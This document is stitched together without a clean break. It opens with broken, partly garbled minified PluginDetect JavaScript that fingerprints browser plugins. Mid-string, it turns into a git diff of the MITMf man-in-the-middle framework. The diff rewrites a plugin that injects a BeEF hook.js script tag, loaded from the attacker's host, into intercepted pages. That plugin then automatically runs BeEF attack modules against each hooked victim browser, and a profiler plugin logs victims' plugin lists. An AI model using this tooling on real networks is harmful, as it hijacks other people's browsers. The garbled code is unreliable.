r}for(p=0;p0?0.7:-0.1):(v?1:(p?-0.2:-1))}if(t.OTF==2&&t.NOTF&&!t.applet.getResult()[0]){t.installed=p?-0.2:-1}if(t.OTF==3&&t.installed!=-0.5&&t.installed!=0.5){t.installed=(t.NOTF.isJavaActive(1)>=1?0.5:-0.5)}if(t.OTF==4&&(t.installed==-0.5||t.installed==0.5)){if(v){t.installed=1}else{if(q){t.installed=q>0?0.7:-0.1}else{if(t.NOTF.isJavaActive(1)>=1){if(p){t.installed=1;v=p}else{t.installed=0}}else{if(p){t.installed=-0.2}else{t.installed=-1}}}}}if(p){t.version0=PluginDetect.formatNum(PluginDetect.getNum(p))}if(v&&!q){t.version=PluginDetect.formatNum(PluginDetect.getNum(v))}if(w&&PluginDetect.isString(w)){t.vendor=w}if(!t.vendor){t.vendor=""}if(t.verify&&t.verify.isEnabled()){t.getVersionDone=0}else{if(t.getVersionDone!=1){if(t.OTF<2){t.getVersionDone=0}else{t.getVersionDone=t.applet.can_Insert_Query_Any()?0:1}}}},DTK:{hasRun:0,status:null,VERSIONS:[],version:"",HTML:null,Plugin2Status:null,classID:["clsid:CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA","clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA"],mimeType:["application/java-deployment-toolkit","application/npruntime-scriptable-plugin;DeploymentToolkit"],isDisabled:function(p){var q=this;if(q.HTML){return 1}if(p||PluginDetect.dbug){return 0}if(q.hasRun||!PluginDetect.DOM.isEnabled.objectTagUsingActiveX()){return 1}return 0},query:function(B){var z=this,t=a,A,v,p=PluginDetect.DOM.altHTML,u={},q,s=null,w=null,r=z.isDisabled(B);z.hasRun=1;if(r){return z}z.status=0;if(PluginDetect.DOM.isEnabled.objectTagUsingActiveX()){for(A=0;A0?1:-1;for(A=0;A0){p.version=q;p.mimeObj=s;p.pluginObj=r;p.mimetype=s.type;}}},query:function(){var t=this,s=a,w,v,B,A,z,r,q=navigator.mimeTypes,p=t.isDisabled();t.hasRun=1;if(p){return t}r=q.length;if(PluginDetect.isNum(r)){for(w=0;w=5){p="1,"+RegExp.$1+","+(RegExp.$2?RegExp.$2:"0")+","+(RegExp.$3?RegExp.$3:"0");}return p},getPluginNum:function(){var s=this,q=a,p=0,u,t,r,w,v=0;r=/Java[^\d]*Plug-in/i;w=PluginDetect.pd.findNavPlugin({find:r,num:1,mimes:q.mimeType,plugins:1,dbug:v});if(w){u=s.checkPluginNum(w.description,r);t=s.checkPluginNum(w.name,r);p=u&&t?(PluginDetect.compareNums(u,t)>0?u:t):(u||t)}if(!p){r=/Java.*\d.*Plug-in/i;w=PluginDetect.pd.findNavPlugin({find:r,mimes:q.mimeType,plugins:1,dbug:v});if(w){u=s.checkPluginNum(w.description,r);t=s.checkPluginNum(w.name,r);p=u&&t?(PluginDetect.compareNums(u,t)>0?u:t):(u||t)}}return p},checkPluginNum:function(s,r){var p,q;p=r.test(s)?PluginDetect.formatNum(PluginDetect.getNum(s)):0;if(p&&PluginDetect.compareNums(p,PluginDetect.formatNum("10"))>=0){q=p.split(PluginDetect.splitNumRegx);p=PluginDetect.formatNum("1,"+(parseInt(q[0],10)-3)+",0,"+q[1])}if(p&&(PluginDetect.compareNums(p,PluginDetect.formatNum("1,3"))<0||PluginDetect.compareNums(p,PluginDetect.formatNum("2"))>=0)){p=0}return p},query:function(){var t=this,s=a,r,p=0,q=t.hasRun||!s.navigator.mimeObj;t.hasRun=1;if(q){return t}if(!p||PluginDetect.dbug){r=t.getPlatformNum();if(r){p=r}}if(!p||PluginDetect.dbug){r=t.getPluginNum();if(r){p=r}}if(p){t.version=PluginDetect.formatNum(p)}return t}},applet:{codebase:{isMin:function(p){this.$$=a;return PluginDetect.codebase.isMin(this,p)},search:function(){this.$$=a;return PluginDetect.codebase.search(this)},DIGITMAX:[[15,128],[6,0,512],0,[1,5,2,256],0,[1,4,1,1],[1,4,0,64],[1,3,2,32]],DIGITMIN:[1,0,0,0],Upper:["999","10","5,0,20","1,5,0,20","1,4,1,20","1,4,1,2","1,4,1","1,4"],Lower:["10","5,0,20","1,5,0,20","1,4,1,20","1,4,1,2","1,4,1","1,4","0"],convert:[function(r,q){return 
q?[parseInt(r[0],10)>1?"99":parseInt(r[1],10)+3+"",r[3],"0","0"]:["1",parseInt(r[0],10)-3+"","0",r[1]]},function(r,q){return q?[r[1],r[2],r[3]+"0","0"]:["1",r[0],r[1],r[2].substring(0,r[2].length-1||1)]},0,function(r,q){return q?[r[0],r[1],r[2],r[3]+"0"]:[r[0],r[1],r[2],r[3].substring(0,r[3].length-1||1)]},0,1,function(r,q){return q?[r[0],r[1],r[2],r[3]+"0"]:[r[0],r[1],r[2],r[3].substring(0,r[3].length-1||1)]},1]},results:[[null,null],[null,null],[null,null],[null,null]],getResult:function(){var q=this,s=q.results,p,r=[];for(p=s.length-1;p>=0;p--){r=s[p];if(r[0]){break}}r=[].concat(r);return r},DummySpanTagHTML:0,HTML:[0,0,0,0],active:[0,0,0,0],DummyObjTagHTML:0,DummyObjTagHTML2:0,allowed:[1,1,1,1],VerifyTagsHas:function(q){var r=this,p;for(p=0;pp-1&&PluginDetect.isNum(r[p-1])){if(r[p-1]<0){r[p-1]=0}if(r[p-1]>3){r[p-1]=3}q.allowed[p]=r[p-1]}}q.allowed[0]=q.allowed[3];}},setVerifyTagsArray:function(r){var q=this,p=a;if(p.getVersionDone===null){q.saveAsVerifyTagsArray(p.getVerifyTagsDefault())}if(PluginDetect.dbug){q.saveAsVerifyTagsArray([3,3,3])}else{if(r){q.saveAsVerifyTagsArray(r)}}},isDisabled:{single:function(q){var p=this;if(p.all()){return 1}if(q==1){return !PluginDetect.DOM.isEnabled.objectTag()}if(q==2){return p.AppletTag()}if(q===0){return PluginDetect.codebase.isDisabled()}if(q==3){return !PluginDetect.DOM.isEnabled.objectTagUsingActiveX()}return 1},all_:null,all:function(){var r=this,t=a,q=t.navigator,p,s=PluginDetect.browser;if(r.all_===null){if((s.isOpera&&PluginDetect.compareNums(s.verOpera,"13,0,0,0")<0&&!q.javaEnabled())||(r.AppletTag()&&!PluginDetect.DOM.isEnabled.objectTag())||(!q.mimeObj&&!s.isIE)){p=1}else{p=0}r.all_=p}return r.all_},AppletTag:function(){var q=a,p=q.navigator;return PluginDetect.browser.isIE?!p.javaEnabled():0},VerifyTagsDefault_1:function(){var q=PluginDetect.browser,p=1;if(q.isIE&&!q.ActiveXEnabled){p=0}if((q.isIE&&q.verIE<9)||(q.verGecko&&PluginDetect.compareNums(q.verGecko,PluginDetect.formatNum("2"))<0)||(q.isSafari&&(!q.verSafari||PluginDetect.compareNums(q.verSafari,PluginDetect.formatNum("4"))<0))||(q.isOpera&&PluginDetect.compareNums(q.verOpera,PluginDetect.formatNum("11"))<0)){p=0}return p}},can_Insert_Query:function(s){var q=this,r=q.results[0][0],p=q.getResult()[0];if(q.HTML[s]||(s===0&&r!==null&&!q.isRange(r))||(s===0&&p&&!q.isRange(p))){return 0}return !q.isDisabled.single(s)},can_Insert_Query_Any:function(){var q=this,p;for(p=0;p0||!r.isRange(p));if(!r.can_Insert_Query(s)||t[s]===0){return 0}if(t[s]==3||(t[s]==2.8&&!p)){return 1}if(!q.nonAppletDetectionOk(q.version0)){if(t[s]==2||(t[s]==1&&!p)){return 1}}return 0},should_Insert_Query_Any:function(){var q=this,p;for(p=0;p]/).test(p||"")?(p.charAt(0)==">"?1:-1):0},setRange:function(q,p){return(q?(q>0?">":"<"):"")+(PluginDetect.isString(p)?p:"")},insertJavaTag:function(z,w,p,s,D){var t=a,v="A.class",A=PluginDetect.file.getValid(t),y=A.name+A.ext,x=A.path;var u=["archive",y,"code",v],E=(s?["width",s]:[]).concat(D?["height",D]:[]),r=["mayscript","true"],C=["scriptable","true","codebase_lookup","false"].concat(r),B=t.navigator,q=!PluginDetect.browser.isIE&&B.mimeObj&&B.mimeObj.type?B.mimeObj.type:t.mimeType[0];if(z==1){return PluginDetect.browser.isIE?PluginDetect.DOM.insert("object",["type",q].concat(E),["codebase",x].concat(u).concat(C),p,t,0,w):PluginDetect.DOM.insert("object",["type",q].concat(E),["codebase",x].concat(u).concat(C),p,t,0,w)}if(z==2){return 
PluginDetect.browser.isIE?PluginDetect.DOM.insert("applet",["alt",p].concat(r).concat(u).concat(E),["codebase",x].concat(C),p,t,0,w):PluginDetect.DOM.insert("applet",["codebase",x,"alt",p].concat(r).concat(u).concat(E),[].concat(C),p,t,0,w)}if(z==3){return PluginDetect.browser.isIE?PluginDetect.DOM.insert("object",["classid",t.classID].concat(E),["codebase",x].concat(u).concat(C),p,t,0,w):PluginDetect.DOM.insert()}if(z==4){return PluginDetect.DOM.insert("embed",["codebase",x].concat(u).concat(["type",q]).concat(C).concat(E),[],p,t,0,w)}return PluginDetect.DOM.insert()},insertIframe:function(p){return PluginDetect.DOM.iframe.insert(99,p)},insert_Query_Any:function(w){var q=this,r=a,y=PluginDetect.DOM,u=q.results,x=q.HTML,p=y.altHTML,t,s,v=PluginDetect.file.getValid(r);if(q.should_Insert_Query(0)){if(r.OTF<2){r.OTF=2}u[0]=[0,0];t=w?q.codebase.isMin(w):q.codebase.search();if(t){u[0][0]=w?q.setRange(t,w):t}q.active[0]=t?1.5:-1}if(!v){return q.getResult()}if(!q.DummySpanTagHTML){s=q.insertIframe("applet.DummySpanTagHTML");q.DummySpanTagHTML=y.insert("",[],[],p,0,0,s);y.iframe.close(s)}if(q.should_Insert_Query(1)){if(r.OTF<2){r.OTF=2}s=q.insertIframe("applet.HTML[1]");x[1]=q.insertJavaTag(1,s,p);y.iframe.close(s);u[1]=[0,0];q.query(1)}if(q.should_Insert_Query(2)){if(r.OTF<2){r.OTF=2}s=q.insertIframe("applet.HTML[2]");x[2]=q.insertJavaTag(2,s,p);y.iframe.close(s);u[2]=[0,0];q.query(2)}if(q.should_Insert_Query(3)){if(r.OTF<2){r.OTF=2}s=q.insertIframe("applet.HTML[3]");x[3]=q.insertJavaTag(3,s,p);y.iframe.close(s);u[3]=[0,0];q.query(3)}if(y.isEnabled.objectTag()){if(!q.DummyObjTagHTML&&(x[1]||x[2])){s=q.insertIframe("applet.DummyObjTagHTML");q.DummyObjTagHTML=y.insert("object",["type",r.mimeType_dummy],[],p,0,0,s);y.iframe.close(s)}if(!q.DummyObjTagHTML2&&x[3]){s=q.insertIframe("applet.DummyObjTagHTML2");q.DummyObjTagHTML2=y.insert("object",["classid",r.classID_dummy],[],p,0,0,s);y.iframe.close(s)}}r.NOTF.init();return q.getResult()}},NOTF:{count:0,count2:0,countMax:25,intervalLength:250,init:function(){var q=this,p=a;if(p.OTF<3&&q.shouldContinueQuery()){p.OTF=3;PluginDetect.ev.setTimeout(q.onIntervalQuery,q.intervalLength);}},allHTMLloaded:function(){var r=a.applet,q,p=[r.DummySpanTagHTML,r.DummyObjTagHTML,r.DummyObjTagHTML2].concat(r.HTML);for(q=0;q2){return p}}else{t.count2=t.count}for(q=0;q=2||(r.allowed[q]==1&&!r.getResult()[0]))&&(!t.count||t.isAppletActive(q)>=0)){p=1}}}return p},isJavaActive:function(s){var u=this,r=a,p,q,t=-9;for(p=0;pt){t=q}}return t},isAppletActive:function(t,u){var v=this,q=a,A=q.navigator,p=q.applet,w=p.HTML[t],s=p.active,z,r=0,y,B=s[t];if(u||B>=1.5||!w||!w.span()){return B}y=PluginDetect.DOM.getTagStatus(w,p.DummySpanTagHTML,p.DummyObjTagHTML,p.DummyObjTagHTML2,v.count);for(z=0;z0){r=1}}if(y!=1){B=y}else{if(PluginDetect.browser.isIE||(q.version0&&A.javaEnabled()&&A.mimeObj&&(w.tagName=="object"||r))){B=1}else{B=0}}s[t]=B;return B},onIntervalQuery:function(){var q=a.NOTF,p;q.count++;if(a.OTF==3){p=q.queryAllApplets();if(!q.shouldContinueQuery()){q.queryCompleted(p)}}if(a.OTF==3){PluginDetect.ev.setTimeout(q.onIntervalQuery,q.intervalLength)}},queryAllApplets:function(){var t=this,s=a,r=s.applet,q,p;for(q=0;q=4){return}q.OTF=4;r.isJavaActive();q.setPluginStatus(p[0],p[1],0);PluginDetect.ev.callArray(q.DoneHndlrs);}}};PluginDetect.addPlugin("java",a);var m={getVersion:function(){var 
r=this,p=null,q;if((!q||PluginDetect.dbug)&&r.nav.query().installed){q=1}if((!p||PluginDetect.dbug)&&r.nav.query().version){p=r.nav.version}if((!q||PluginDetect.dbug)&&r.axo.query().installed){q=1}if((!p||PluginDetect.dbug)&&r.axo.query().version){p=r.axo.version}r.installed=p?1:(q?0:-1);r.version=PluginDetect.formatNum(p)},nav:{hasRun:0,installed:0,version:null,mimeType:"application/x-devalvrx",query:function(){var s=this,p,r,q=s.hasRun||!PluginDetect.hasMimeType(s.mimeType);s.hasRun=1;if(q){return s}r=PluginDetect.pd.findNavPlugin({find:"DevalVR.*Plug-?in",mimes:s.mimeType,plugins:"DevalVR 3D Plugin"});if(r&&(/Plug-?in(.*)/i).test(r.description||"")){p=PluginDetect.getNum(RegExp.$1)}if(r){s.installed=1}if(p){s.version=p}return s}},axo:{hasRun:0,installed:0,version:null,progID:["DevalVRXCtrl.DevalVRXCtrl","DevalVRXCtrl.DevalVRXCtrl.1"],classID:"clsid:5D2CF9D0-113A-476B-986F-288B54571614",query:function(){var s=this,v=m,q,p,u,r,t=s.hasRun;s.hasRun=1;if(t){return s}for(p=0;p=30226){p[0]="2"}q=p.join(",")}if(q){t.version=q}return t}},axo:{hasRun:0,installed:0,version:null,progID:"AgControl.AgControl",maxdigit:[20,10,10,100,100,10],mindigit:[0,0,0,0,0,0],IsVersionSupported:function(s,q){var p=this;try{return p.testVersion?PluginDetect.compareNums(PluginDetect.formatNum(p.testVersion.join(",")),PluginDetect.formatNum(q.join(",")))>=0:s.IsVersionSupported(p.format(q))}catch(r){}return 0},format:function(q){var p=this;return(q[0]+"."+q[1]+"."+q[2]+p.make2digits(q[3])+p.make2digits(q[4])+"."+q[5])},make2digits:function(p){return(p<10?"0":"")+p+""},query:function(){var r=this,q,v,s=r.hasRun;r.hasRun=1;if(s){return r}v=PluginDetect.getAXO(r.progID);if(v){r.installed=1}if(v&&r.IsVersionSupported(v,r.mindigit)){var p=[].concat(r.mindigit),u,t=0;for(q=0;q1&&u<20){u++;t++;p[q]=Math.round((r.maxdigit[q]+r.mindigit[q])/2);if(r.IsVersionSupported(v,p)){r.mindigit[q]=p[q]}else{r.maxdigit[q]=p[q]}}p[q]=r.mindigit[q]}r.version=r.format(p);}return r}}};PluginDetect.addPlugin("silverlight",h);var f={compareNums:function(s,r){var A=s.split(PluginDetect.splitNumRegx),y=r.split(PluginDetect.splitNumRegx),w,q,p,v,u,z;for(w=0;w0)?RegExp.$2.charCodeAt(0):-1;z=/([\d]+)([a-z]?)/.test(y[w]);p=parseInt(RegExp.$1,10);u=(w==2&&RegExp.$2.length>0)?RegExp.$2.charCodeAt(0):-1;if(q!=p){return(q>p?1:-1)}if(w==2&&v!=u){return(v>u?1:-1)}}return 0},setPluginStatus:function(r,p,s){var q=this;q.installed=p?1:(s?(s>0?0.7:-0.1):(r?0:-1));if(p){q.version=PluginDetect.formatNum(p)}q.getVersionDone=q.installed==0.7||q.installed==-0.1?0:1;},getVersion:function(s){var t=this,r,p=null,q;if((!r||PluginDetect.dbug)&&t.nav.query().installed){r=1}if((!p||PluginDetect.dbug)&&t.nav.query().version){p=t.nav.version}if((!r||PluginDetect.dbug)&&t.axo.query().installed){r=1}if((!p||PluginDetect.dbug)&&t.axo.query().version){p=t.axo.version}if(!p||PluginDetect.dbug){q=t.codebase.isMin(s);if(q){t.setPluginStatus(0,0,q);return}}if(!p||PluginDetect.dbug){q=t.codebase.search();if(q){r=1;p=q}}t.setPluginStatus(r,p,0)},nav:{hasRun:0,installed:0,version:null,mimeType:["application/x-vlc-plugin","application/x-google-vlc-plugin","application/mpeg4-muxcodetable","application/x-matroska","application/xspf+xml","video/divx","video/webm","video/x-mpeg","video/x-msvideo","video/ogg","audio/x-flac","audio/amr","audio/amr"],find:"VLC.*Plug-?in",find2:"VLC|VideoLAN",avoid:"Totem|Helix",plugins:["VLC Web Plugin","VLC Multimedia Plug-in","VLC Multimedia Plugin","VLC multimedia plugin"],query:function(){var 
s=this,p,r,q=s.hasRun||!PluginDetect.hasMimeType(s.mimeType);s.hasRun=1;if(q){return s}r=PluginDetect.pd.findNavPlugin({find:s.find,avoid:s.avoid,mimes:s.mimeType,plugins:s.plugins});if(r){s.installed=1;if(r.description){p=PluginDetect.getNum(r.description+"","[\\d][\\d\\.]*[a-z]*")}if(p){s.version=p}}return s}},axo:{hasRun:0,installed:0,version:null,progID:"VideoLAN.VLCPlugin",query:function(){var q=this,s,p,r=q.hasRun;q.hasRun=1;if(r){return q}s=PluginDetect.getAXO(q.progID);if(s){q.installed=1;p=PluginDetect.getNum(PluginDetect.pd.getPROP(s,"VersionInfo"),"[\\d][\\d\\.]*[a-z]*");if(p){q.version=p}}return q}},codebase:{classID:"clsid:9BE31822-FDAD-461B-AD51-BE1D1C159921",isMin:function(p){this.$$=f;return PluginDetect.codebase.isMin(this,p)},search:function(){this.$$=f;return PluginDetect.codebase.search(this)},DIGITMAX:[[11,11,16]],DIGITMIN:[0,0,0,0],Upper:["999"],Lower:["0"],convert:[1]}};PluginDetect.addPlugin("vlc",f);var c={OTF:null,setPluginStatus:function(){var p=this,B=p.OTF,v=p.nav.detected,x=p.nav.version,z=p.nav.precision,C=z,u=x,s=v>0;var H=p.axo.detected,r=p.axo.version,w=p.axo.precision,D=p.doc.detected,G=p.doc.version,t=p.doc.precision,E=p.doc2.detected,F=p.doc2.version,y=p.doc2.precision;u=F||u||r||G;C=y||C||w||t;s=E>0||s||H>0||D>0;u=u||null;p.version=PluginDetect.formatNum(u);p.precision=C;var q=-1;if(B==3){q=p.version?0.5:-0.5}else{if(u){q=1}else{if(s){q=0}else{if(H==-0.5||D==-0.5){q=-0.15}else{if(PluginDetect.browser.isIE&&(!PluginDetect.browser.ActiveXEnabled||PluginDetect.browser.ActiveXFilteringEnabled)){q=-1.5}}}}}p.installed=q;if(p.getVersionDone!=1){var A=1;if((p.verify&&p.verify.isEnabled())||p.installed==0.5||p.installed==-0.5){A=0}else{if(p.doc2.isDisabled()==1){A=0}}p.getVersionDone=A}},getVersion:function(s,r){var p=this,q=0,t=p.verify;if(p.getVersionDone===null){p.OTF=0;if(t){t.init()}}PluginDetect.file.save(p,".pdf",r);if(p.getVersionDone===0){p.doc2.insertHTMLQuery();p.setPluginStatus();return}if((!q||PluginDetect.dbug)&&p.nav.query().version){q=1}if((!q||PluginDetect.dbug)&&p.axo.query().version){q=1}if((!q||PluginDetect.dbug)&&p.doc.query().version){q=1}if(1){p.doc2.insertHTMLQuery()}p.setPluginStatus()},getPrecision:function(v,u,t){if(PluginDetect.isString(v)){u=u||"";t=t||"";var q,s="\\d+",r="[\\.]",p=[s,s,s,s];for(q=4;q>0;q--){if((new RegExp(u+p.slice(0,q).join(r)+t)).test(v)){return q}}}return 0},nav:{detected:0,version:null,precision:0,mimeType:["application/pdf","application/vnd.adobe.pdfxml"],find:"Adobe.*PDF.*Plug-?in|Adobe.*Acrobat.*Plug-?in|Adobe.*Reader.*Plug-?in",plugins:["Adobe Acrobat","Adobe Acrobat and Reader Plug-in","Adobe Reader Plugin"],query:function(){var r=this,q,p=null;if(r.detected||!PluginDetect.hasMimeType(r.mimeType)){return r}q=PluginDetect.pd.findNavPlugin({find:r.find,mimes:r.mimeType,plugins:r.plugins});r.detected=q?1:-1;if(q){p=PluginDetect.getNum(q.description)||PluginDetect.getNum(q.name);p=PluginDetect.getPluginFileVersion(q,p);if(!p){p=r.attempt3()}if(p){r.version=p;r.precision=c.getPrecision(p)}}return r},attempt3:function(){var p=null;if(PluginDetect.OS==1){if(PluginDetect.hasMimeType("application/vnd.adobe.pdfxml")){p="9"}else{if(PluginDetect.hasMimeType("application/vnd.adobe.x-mars")){p="8"}else{if(PluginDetect.hasMimeType("application/vnd.adobe.xfdf")){p="6"}}}}return p}},activexQuery:function(w){var 
u="",t,q,s,r,p={precision:0,version:null};try{if(w){u=w.GetVersions()+"";}}catch(v){}if(u&&PluginDetect.isString(u)){t=/\=\s*[\d\.]+/g;r=u.match(t);if(r){for(q=0;q0)){p.version=s}}p.precision=c.getPrecision(u,"\\=\\s*")}}return p},axo:{detected:0,version:null,precision:0,progID:["AcroPDF.PDF","AcroPDF.PDF.1","PDF.PdfCtrl","PDF.PdfCtrl.5","PDF.PdfCtrl.1"],progID_dummy:"AcroDUMMY.DUMMY",query:function(){var t=this,q=c,u,v,s,r,p,w;if(t.detected){return t}t.detected=-1;v=PluginDetect.getAXO(t.progID_dummy);if(!v){w=PluginDetect.errObj}for(p=0;p0||w?1:(q==-0.1||q==-0.5?-0.5:-1);if(w){y.version=w}if(t){y.precision=t}return y}},doc2:{detected:0,version:null,precision:0,classID:"clsid:CA8A9780-280D-11CF-A24D-444553540000",mimeType:"application/pdf",HTML:0,count:0,count2:0,time2:0,intervalLength:50,maxCount:150,isDisabled:function(){var r=this,v=c,u=v.axo,p=v.nav,x=v.doc,w,t,q=0,s;if(r.HTML){q=2}else{if(PluginDetect.dbug){}else{if(!PluginDetect.DOM.isEnabled.objectTagUsingActiveX()){q=2}else{w=(p?p.version:0)||(u?u.version:0)||(x?x.version:0)||0;t=(p?p.precision:0)||(u?u.precision:0)||(x?x.precision:0)||0;if(!w||!t||t>2||PluginDetect.compareNums(PluginDetect.formatNum(w),PluginDetect.formatNum("11"))<0){q=2}}}}if(q<2){s=PluginDetect.file.getValid(v);if(!s||!s.full){q=1}}return q},handlerSet:0,onMessage:function(){var p=this;return function(q){if(p.version){return}p.detected=1;if(PluginDetect.isArray(q)){q=q[0]}q=PluginDetect.getNum(q+"");if(q){if(!(/[.,_]/).test(q)){q+="."}q+="00000";if((/^(\d+)[.,_](\d)(\d\d)(\d\d)/).test(q)){q=RegExp.$1+","+RegExp.$2+","+RegExp.$3+","+RegExp.$4}p.version=PluginDetect.formatNum(q);p.precision=3;c.setPluginStatus()}}},isDefinedMsgHandler:function(q,r){try{return q?q.messageHandler!==r:0}catch(p){}return 1},queryObject:function(){var r=this,s=r.HTML,q=s?s.obj():0;if(!q){return}if(!r.handlerSet&&r.isDefinedMsgHandler(q)){try{q.messageHandler={onMessage:r.onMessage()}}catch(p){}r.handlerSet=1;r.count2=r.count;r.time2=(new Date()).getTime()}if(!r.detected){if(r.count>3&&!r.handlerSet){r.detected=-1}else{if(r.time2&&r.count-r.count2>=r.maxCount&&(new Date()).getTime()-r.time2>=r.intervalLength*r.maxCount){r.detected=-0.5}}}if(r.detected){if(r.detected!=-1){}}},insertHTMLQuery:function(){var u=this,p=c,r=PluginDetect.DOM.altHTML,q,s,t=0;if(u.isDisabled()){return u}if(p.OTF<2){p.OTF=2}q=PluginDetect.file.getValid(p).full;s=PluginDetect.DOM.iframe.insert(0,"Adobe Reader");PluginDetect.DOM.iframe.write(s,'' % (self.ip_address, beefconfig['beefport'])
diff --git a/plugins/BeEFAutorun.py b/plugins/BeEFAutorun.py
--- a/plugins/BeEFAutorun.py
+++ b/plugins/BeEFAutorun.py
-
- beef = BeefAPI({"host": beefconfig['beefip'], "port": beefconfig['beefport']})
- if not beef.login(beefconfig['user'], beefconfig['pass']):
- sys.exit("[-] Error logging in to BeEF!")
- self.tree_output.append("Mode: %s" % self.Mode)
+ self.tree_output.append("Mode: {}".format(self.config['BeEFAutorun']['mode']))
+ self.onConfigChange()
- t = threading.Thread(name="autorun", target=self.autorun, args=(beef,))
- t.setDaemon(True)
- t.start()
+ def onConfigChange(self):
- def autorun(self, beef):
+ beefconfig = self.config['MITMf']['BeEF']
+
+ self.html_payload = '<script type="text/javascript" src="http://{}:{}/hook.js"></script>'.format(self.ip_address, beefconfig['beefport'])
+
+ self.beef = BeefAPI({"host": beefconfig['beefip'], "port": beefconfig['beefport']})
+ if not self.beef.login(beefconfig['user'], beefconfig['pass']):
+ shutdown("[-] Error logging in to BeEF!")
+
+ def startThread(self, options):
+ self.autorun()
+
+ def autorun(self):
already_ran = []
already_hooked = []
while True:
- sessions = beef.sessions_online()
+ mode = self.config['BeEFAutorun']['mode']
+ sessions = self.beef.sessions_online()
if (sessions is not None and len(sessions) > 0):
for session in sessions:
if session not in already_hooked:
- info = beef.hook_info(session)
- mitmf_logger.info("%s >> joined the horde! [id:%s, type:%s-%s, os:%s]" % (info['ip'], info['id'], info['name'], info['version'], info['os']))
+ info = self.beef.hook_info(session)
+ mitmf_logger.info("{} >> joined the horde! [id:{}, type:{}-{}, os:{}]".format(info['ip'], info['id'], info['name'], info['version'], info['os']))
already_hooked.append(session)
self.black_ips.append(str(info['ip']))
- if self.Mode == 'oneshot':
+ if mode == 'oneshot':
if session not in already_ran:
- self.execModules(session, beef)
+ self.execModules(session)
already_ran.append(session)
- elif self.Mode == 'loop':
- self.execModules(session, beef)
+ elif mode == 'loop':
+ self.execModules(session)
sleep(10)
else:
sleep(1)
- def execModules(self, session, beef):
- session_info = beef.hook_info(session)
- session_ip = session_info['ip']
- hook_browser = session_info['name']
- hook_os = session_info['os']
+ def execModules(self, session):
+ session_info = self.beef.hook_info(session)
+ session_ip = session_info['ip']
+ hook_browser = session_info['name']
+ hook_os = session_info['os']
+ all_modules = self.config['BeEFAutorun']["ALL"]
+ targeted_modules = self.config['BeEFAutorun']["targets"]
- if len(self.All_modules) > 0:
- mitmf_logger.info("%s >> sending generic modules" % session_ip)
- for module, options in self.All_modules.iteritems():
- mod_id = beef.module_id(module)
- resp = beef.module_run(session, mod_id, json.loads(options))
+ if len(all_modules) > 0:
+ mitmf_logger.info("{} >> sending generic modules".format(session_ip))
+ for module, options in all_modules.iteritems():
+ mod_id = self.beef.module_id(module)
+ resp = self.beef.module_run(session, mod_id, json.loads(options))
if resp["success"] == 'true':
- mitmf_logger.info('%s >> sent module %s' % (session_ip, mod_id))
+ mitmf_logger.info('{} >> sent module {}'.format(session_ip, mod_id))
else:
- mitmf_logger.info('%s >> ERROR sending module %s' % (session_ip, mod_id))
+ mitmf_logger.info('{} >> ERROR sending module {}'.format(session_ip, mod_id))
sleep(0.5)
- mitmf_logger.info("%s >> sending targeted modules" % session_ip)
- for os in self.Targeted_modules:
+ mitmf_logger.info("{} >> sending targeted modules".format(session_ip))
+ for os in targeted_modules:
if (os in hook_os) or (os == hook_os):
- browsers = self.Targeted_modules[os]
+ browsers = targeted_modules[os]
if len(browsers) > 0:
for browser in browsers:
if browser == hook_browser:
- modules = self.Targeted_modules[os][browser]
+ modules = targeted_modules[os][browser]
if len(modules) > 0:
for module, options in modules.iteritems():
- mod_id = beef.module_id(module)
- resp = beef.module_run(session, mod_id, json.loads(options))
+ mod_id = self.beef.module_id(module)
+ resp = self.beef.module_run(session, mod_id, json.loads(options))
if resp["success"] == 'true':
- mitmf_logger.info('%s >> sent module %s' % (session_ip, mod_id))
+ mitmf_logger.info('{} >> sent module {}'.format(session_ip, mod_id))
else:
- mitmf_logger.info('%s >> ERROR sending module %s' % (session_ip, mod_id))
+ mitmf_logger.info('{} >> ERROR sending module {}'.format(session_ip, mod_id))
sleep(0.5)
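
With the rewrite above, BeEFAutorun reads its mode from `self.config` on every loop pass and re-reads the BeEF connection settings in `onConfigChange()`. A hedged sketch of the nested shape `autorun()`/`execModules()` expect, written as a plain dict for illustration; the module names, option strings and BeEF credentials are invented examples, not shipped defaults:

```python
# Illustrative config shape for the keys read above: mode, ALL, targets, and MITMf/BeEF.
config = {
    'BeEFAutorun': {
        'mode': 'oneshot',                      # or 'loop'
        'ALL': {                                # module -> JSON options, sent to every hooked browser
            'Alert Dialog': '{"text": "hooked"}',
        },
        'targets': {                            # os -> browser -> module -> JSON options
            'Windows': {
                'Chrome': {'Get System Info': '{}'},
            },
        },
    },
    'MITMf': {
        'BeEF': {'beefip': '127.0.0.1', 'beefport': '3000', 'user': 'beef', 'pass': 'beef'},
    },
}
```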
diff --git a/plugins/BrowserProfiler.py b/plugins/BrowserProfiler.py
index 8f3afa1..aa831f4 100644
--- a/plugins/BrowserProfiler.py
+++ b/plugins/BrowserProfiler.py
@@ -17,113 +17,49 @@
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
-
-from plugins.plugin import Plugin
-from plugins.Inject import Inject
-from pprint import pformat
import logging
-mitmf_logger = logging.getLogger('mitmf')
+from pprint import pformat
+from plugins.plugin import Plugin
+from plugins.Inject import Inject
+
+mitmf_logger = logging.getLogger("mitmf")
class BrowserProfiler(Inject, Plugin):
- name = "Browser Profiler"
+ name = "BrowserProfiler"
optname = "browserprofiler"
desc = "Attempts to enumerate all browser plugins of connected clients"
- implements = ["handleResponse", "handleHeader", "connectionMade", "sendPostData"]
- depends = ["Inject"]
- version = "0.2"
+ version = "0.3"
has_opts = False
def initialize(self, options):
+ self.output = {} # so other plugins can access the results
+
Inject.initialize(self, options)
self.html_payload = self.get_payload()
- self.dic_output = {} # so other plugins can access the results
-
+
def post2dict(self, post): #converts the ajax post to a dict
- dict = {}
+ d = dict()
for line in post.split('&'):
t = line.split('=')
- dict[t[0]] = t[1]
- return dict
+ d[t[0]] = t[1]
+ return d
- def sendPostData(self, request):
+ def clientRequest(self, request):
#Handle the plugin output
if 'clientprfl' in request.uri:
- self.dic_output = self.post2dict(request.postData)
- self.dic_output['ip'] = str(request.client.getClientIP()) # add the IP of the client
- if self.dic_output['plugin_list'] > 0:
- self.dic_output['plugin_list'] = self.dic_output['plugin_list'].split(',')
- pretty_output = pformat(self.dic_output)
- mitmf_logger.info("%s >> Browser Profiler data:\n%s" % (request.client.getClientIP(), pretty_output))
+ request.printPostData = False
+
+ self.output = self.post2dict(request.postData)
